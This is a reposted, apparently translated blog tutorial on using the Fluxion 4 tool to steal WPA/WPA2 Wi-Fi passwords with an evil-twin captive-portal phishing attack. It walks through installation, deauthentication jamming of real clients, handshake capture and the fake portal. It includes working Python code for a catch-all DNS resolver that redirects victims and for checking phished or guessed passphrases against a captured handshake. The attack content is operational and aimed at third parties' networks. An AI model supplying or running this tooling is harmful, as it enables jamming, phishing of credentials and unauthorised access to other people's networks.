Fluxion 4 Usage Guide
Disclaimer: this article is not original; to prevent others from reposting it at will, it is deliberately tagged as original.
Most of the Fluxion tutorials circulating in China are for old versions, and I never found one for version 4, so I specially brought this article over from abroad for anyone who needs a reference. I originally planned to write one myself, but since the core of this tool is social engineering, I have never once succeeded with it in practice, so I could not be bothered to write it. If you need a translation, or run into any problems while trying it, feel free to pester me at any time.
What is Fluxion for?
Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It is compatible with the latest release of Kali (rolling). Fluxion's attack setup is mostly manual, but an experimental auto-mode handles some of the attacks' setup parameters.
The advantage of this approach is that it does not require a long brute-force run on powerful hardware. The downside is that social engineering attacks do not work every time.
How it works
Scan for a target wireless network.
Launch the Handshake Snooper attack.
Capture a handshake (necessary for password verification).
Launch the Captive Portal attack.
Spawns a rogue (fake) AP, imitating the original access point.
Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal.
Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key.
Spawns a jammer, deauthenticating all clients from the original AP and luring them to the rogue AP.
All authentication attempts at the captive portal are checked against the handshake file captured earlier.
The attack will automatically terminate once a correct key has been submitted. The key will be logged and clients will be allowed to reconnect to the target access point.
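The "DNS server redirecting all requests to the attacker's host" step above is the piece that makes a captive portal appear no matter which site the victim opens. The following is an added example, not code from the page or from the Fluxion project: a minimal catch-all resolver in Python that parses a DNS query from the wire and answers every IN A question with the portal host's address. Non-A queries (e.g. AAAA) get an empty NOERROR reply so clients fall back to IPv4 instead of timing out. The portal address 10.0.0.1, the sample name captive.apple.com and the transaction ID are constructed values.

```python
import socket
import struct
from typing import Optional, Tuple


def encode_qname(name: str) -> bytes:
    """Encode "www.example.com" as DNS wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_qname(msg: bytes, offset: int) -> Tuple[str, int]:
    """Decode the uncompressed QNAME at offset; return (name, offset just past it)."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointers are not valid in a question")
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Constructed sample: a standard recursive query (RD=1) as a client would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack("!HH", qtype, 1)


def spoofed_response(query: bytes, portal_ip: str, ttl: int = 60) -> bytes:
    """Answer any IN A query with portal_ip; answer anything else with no records."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    _, end = decode_qname(query, 12)
    qtype, qclass = struct.unpack("!HH", query[end:end + 4])
    question = query[12:end + 4]
    # QR=1, RD copied from the query, RA=1, RCODE=0 (NOERROR)
    rflags = 0x8000 | (flags & 0x0100) | 0x0080
    if qtype != 1 or qclass != 1:
        return struct.pack("!HHHHHH", txid, rflags, 1, 0, 0, 0) + question
    # NAME is a pointer to offset 12 (the question's QNAME), TYPE A, CLASS IN, TTL, RDLENGTH 4
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(portal_ip)
    return struct.pack("!HHHHHH", txid, rflags, 1, 1, 0, 0) + question + answer


def answered_ip(response: bytes) -> Optional[str]:
    """Extract the A record address from a response built by spoofed_response."""
    _, _, _, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    if ancount == 0:
        return None
    return socket.inet_ntoa(response[-4:])


def serve(bind_ip: str, portal_ip: str, port: int = 53) -> None:
    """Blocking UDP loop; needs root for port 53 and should bind to the rogue AP's interface."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(spoofed_response(data, portal_ip), peer)
        except (ValueError, IndexError, struct.error):
            pass  # malformed query: drop it rather than crash the resolver


if __name__ == "__main__":
    serve("0.0.0.0", "10.0.0.1")
```

Pointing the rogue network's DHCP at this resolver is what turns "open any web site" into "land on the portal"; the web server behind it still has to serve the portal page for whatever Host header arrives.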
How to install Fluxion in Kali Linux
To install Fluxion in Kali Linux run the commands:
git clone https://github.com/FluxionNetwork/fluxion
cd fluxion/
sudo ./fluxion.sh
Note that we did not manually install the dependencies of Fluxion, because the first time you run the program, it will check the missing dependencies and install them.
When downloading the program files, you can specify the --recursive flag and then the program will be downloaded, as well as additional skins for Captive Portals (those web pages that victims see on their devices during the attack):
git clone https://github.com/FluxionNetwork/fluxion --recursive
About installation in Ubuntu and its derived distributions, see the article ‘How to install Fluxion in Linux Mint or Ubuntu’.
New Fluxion 4 manual
The program has an automatic mode, but it is rather experimental. The program has an interactive text menu.
Stop Network Manager and processes that can interfere:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
Typical launch of the program, go to its folder:
cd fluxion/
The program is updated very often, so to download the latest version, run the command:
git pull
And we start:
sudo ./fluxion.sh
Select language:
We need to grab a handshake. It will not be used for brute-force (there will be no brute-force at all), but it is necessary to check whether the user entered the correct password. Therefore, we select item two:
[2] Handshake Snooper Acquires WPA/WPA2 encryption hashes.
Select a wireless interface for target searching:
Select the channel where you want to search for targets:
Five seconds after the target AP appears, close the FLUXION Scanner (ctrl+c).
When you see the desired target, close the new window, the list of access points will be displayed in the main program window:
When entering the number of an access point, which we will attack, DO NOT enter leading zeros.
Select an interface for target tracking.
Select a method of handshake retrieval

 [1] Monitor (passive)
 [2] aireplay-ng deauthentication (aggressive)
 [3] mdk3 deauthentication (aggressive)
The passive method keeps the radio completely silent, making the attack subtle (hard to detect) and allowing for better listening. This method should work best when the target is far away. The downside is that the radio must keep listening until someone connects to the target access point, which could take a very long time.
An aggressive method uses a deauthenticator, either aireplay-ng or mdk3, and sends deauthentication frames to the target access point's clients. It is considered aggressive because it is essentially jamming the connection between the target access point and its clients, effectively cutting the connection between the two. Once the connection has been broken, some devices will automatically attempt to reconnect, performing a 4-way handshake which Fluxion's radio can catch. This method could be considered illegal. Make sure to follow the laws that apply to you. We are not liable for your irresponsibility.
Select a method of verification for the hash. Here we select the program that will determine whether enough frames have already been captured to verify the password:
How often should the verifier check for a handshake?
How should verification occur?

 [1] Asynchronously (fast systems only).
 [2] Synchronously (recommended).
This sets how verification occurs in relation to capturing data, either simultaneously (asynchronously), or back-to-back (synchronously).
The asynchronous option will run the verifier while the computer is still capturing data. This could cause an issue on slow systems, because pyrit … stripLive might be interrupted by the captor overwriting data too early. The probability of encountering that problem increases over time, since more data needs to be examined by pyrit … stripLive. I suggest avoiding this if possible, or limiting its use to places where the handshake file will be caught relatively quickly.
The synchronous option will halt data capturing before attempting to check for a handshake, to prevent the issues described before. The downside of this method is the fact it'll stop listening while checking for handshakes, meaning it could miss a handshake while checking for one.
Three additional windows will appear periodically. If a handshake is captured, i.e. the attack succeeded, then one of the windows will have such an entry, and the other windows will be closed and the attack stopped:
Now go to the Captive Portal attack.
Many of the wireless adapters used in penetration testing support the addition of a virtual wireless interface. This interface can be in monitor mode or in AP mode. Due to this possibility, when creating a fake access point and simultaneously jamming a real access point, you can use one single Wi-Fi card. And Fluxion knows how to do it.
But since the fourth version, Fluxion has added one more function: tracking (pursuing) the attacked access point. The problem is that some access points change their operating channel when a deauthentication attack is conducted against them. As a result, they become immune to our attack: you have to stop Fluxion, re-select the target and launch the attack again. The essence of the new function is that Fluxion regularly checks which channel the access point is operating on, and if it changes channel, Fluxion automatically restarts the attack on the correct channel.
So, if you want to use the pursuit function, then you need a second wireless card, which supports monitor mode. If you do not have one, you can skip using this function.
Now we launch the other attack:
[1] Captive Portal Creates an "evil twin" access point.
Fluxion is targeting the access point shown above. Agree:
Select an interface for target tracking. This is the new function, about which I spoke just above. If you have two wireless interfaces, select the one you want to use with this feature. If the interface is one, then select ‘Skip’:
Now choose the interface for jamming (choose a different one than the one chosen for the pursuit, otherwise there will be problems):
Select an interface for the access point. If you do not have a separate wireless card to create an access point, then select the same interface that is selected for jamming (this is normal and if the wireless card supports adding a virtual interface, everything will work fine):
Select the program that will create the access point. The authors recommend avoiding airbase-ng if you use the same Wi-Fi card both for creating the access point and for deauthentication (jamming):
If you have already captured a handshake, a message will appear that it has been found. You can use it or specify a path to another:
Again select a method of verification for the hash:
Next, we select the source of the SSL certificate for the captive portal. Options:
[1] Create an SSL certificate
[2] Detect SSL certificate (search again)
[3] None (disable SSL)
When prompted, select an SSL certificate source for the captive portal, or select to disable SSL.
SSL (TLS) encrypts the connection between two endpoints. In this case, the two endpoints are the captive portal's web server and the target client.
If you have your own certificate, save it at fluxion/attacks/Captive Portal/certificate/server.pem and the attack will detect it and select it automatically.
If you do not have your own certificate, you can have one generated automatically. The downside is that such a certificate is self-signed and not trusted by any device, so clients attempting a secure connection to the captive portal will most likely see certificate warnings.
If you would rather not bother with SSL, you can choose to disable it. Once disabled, the captive portal’s web server will only accept unencrypted connections, which exposes the information clients send to fluxion. This can be particularly unsafe if someone’s spying on network traffic. This might also trigger warnings for some clients, since the browser will need to send forms over an unencrypted connection.
In my opinion, in today's reality it is better to use SSL, since the majority of web sites use HTTPS, and it is more likely that a user will agree to proceed over an unsafe connection than that we get a chance of him trying to open a site over HTTP.
Select an internet connectivity type for the rogue network.
When prompted, select whether the captive portal web server should attempt to emulate an internet connection.
This option only affects iOS clients, and some Android clients.
This could be useful for people that don’t want to make the captive portal obvious. The clients will connect, but will be fooled into believing internet access is available. This will cause all iOS clients, and some Android clients to not show the captive portal immediately upon connecting to the rogue network, however, the captive portal will still show up once the clients try accessing any web site.
Warning: This could cause clients to hang while trying to load sites, including iOS clients. The issue occurs when this option is selected, and SSL is disabled. The cause is clients attempting to access an SSL capable site, such as google.com, but hanging while waiting for a connection from the captive portal’s web server. The hanging is caused by the clients believing there’s internet access, but no responses received for SSL enabled sites.
Select a captive portal interface for the rogue network. By default, Generic Portals are available in several languages and are suitable for any target:
Now the attack starts, many windows will open.
Clients will be disconnected, and they will not be able to connect to the real network for the entire duration of the attack. But another network will be available to them, one without a password, which can be joined with one tap:
If the client does this, then when he tries to open any site, he will be redirected to the Captive Portal:
All the data entered is transmitted to Fluxion, which checks in real-time whether the password is correct or not. If the password is not correct, then such a window is displayed, and the attack continues:
If the password is correct, it is shown to the attacker and the attack stops immediately. After that, the client (victim) device will automatically reconnect to the original access point and regain its normal Internet connection.
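Both the Handshake Snooper section and the real-time check above rely on the same fact: a captured 4-way handshake lets the attacker test any candidate passphrase offline, because message 2 of the handshake carries a MIC computed under a key derived from the PSK. The following is an added example, not code from the page or from the Fluxion project (which delegates this to tools such as aircrack-ng or pyrit): a Python verifier that derives PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes), expands it to the PTK with the 802.11i PRF, and recomputes the EAPOL-Key MIC with the KCK to compare against the captured one. The sample handshake (SSID Fluxion-Lab, the MAC addresses, the fixed nonces and the minimal EAPOL-Key frame) is constructed inline, with its MIC computed exactly as a real client would compute it.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class Handshake:
    """Fields a verifier needs from messages 1 and 2 of the WPA/WPA2 4-way handshake."""
    ssid: bytes
    ap_mac: bytes       # AA,  6 bytes
    client_mac: bytes   # SPA, 6 bytes
    anonce: bytes       # 32 bytes, from message 1
    snonce: bytes       # 32 bytes, from message 2
    eapol: bytes        # EAPOL-Key frame of message 2 with its 16-byte MIC field zeroed
    mic: bytes          # the MIC as captured in message 2
    version: int        # key descriptor version: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1 (CCMP)


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i), truncate to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces); KCK = PTK[0:16]."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed), truncated to 16 bytes."""
    if version == 1:
        return hmac.new(kck, eapol, hashlib.md5).digest()[:16]
    if version == 2:
        return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def check_passphrase(passphrase: str, hs: Handshake) -> bool:
    """True if the candidate passphrase reproduces the MIC captured in message 2."""
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    kck = kck_from_pmk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)
    return hmac.compare_digest(eapol_mic(kck, hs.eapol, hs.version), hs.mic)


def build_eapol_msg2(snonce: bytes, version: int) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (RSN descriptor), MIC field zeroed."""
    key_info = 0x0108 | version   # MIC flag + Pairwise flag + descriptor version
    body = struct.pack("!BHHQ", 2, key_info, 16, 1)   # descriptor type, key info, key length, replay counter
    body += snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
    body += bytes(16) + struct.pack("!H", 0)           # zeroed MIC, key data length 0
    return struct.pack("!BBH", 2, 3, len(body)) + body  # 802.1X v2, type EAPOL-Key, length


def make_sample_handshake(passphrase: str, ssid: bytes) -> Handshake:
    """Constructed sample: fixed MACs and nonces; MIC computed as the real client would."""
    ap_mac, client_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = build_eapol_msg2(snonce, version=2)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol, eapol_mic(kck, eapol, 2), 2)


if __name__ == "__main__":
    hs = make_sample_handshake("correct horse battery", b"Fluxion-Lab")
    for candidate in ("password123", "correct horse battery"):
        print(candidate, "->", check_passphrase(candidate, hs))
```

Each check costs one PBKDF2 run of 4096 HMAC-SHA1 rounds, which is why the captive portal can afford to verify every submission instantly while a dictionary attack against the same handshake is slow. The PBKDF2 step can be cross-checked against the IEEE 802.11 Annex test vector (passphrase "password", SSID "IEEE").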
Additional skins for Captive Portals
There are variants of the Portals simulating different models of routers in different languages, they are in this repository: https://github.com/FluxionNetwork/sites
When you are in the Fluxion folder, you can install them all with the command:
git clone https://github.com/FluxionNetwork/sites ./attacks/Captive\ Portal/sites/
OR with this command:
git submodule update --init --recursive
OR initially download Fluxion with the --recursive flag:
git clone https://github.com/FluxionNetwork/fluxion --recursive
It is not necessary to download them all, you can download some manually, after that place them in the fluxion/attacks/Captive Portal/sites/ folder.
This article was shared from the WeChat public account 一個安全研究員 (sec_tntaxin).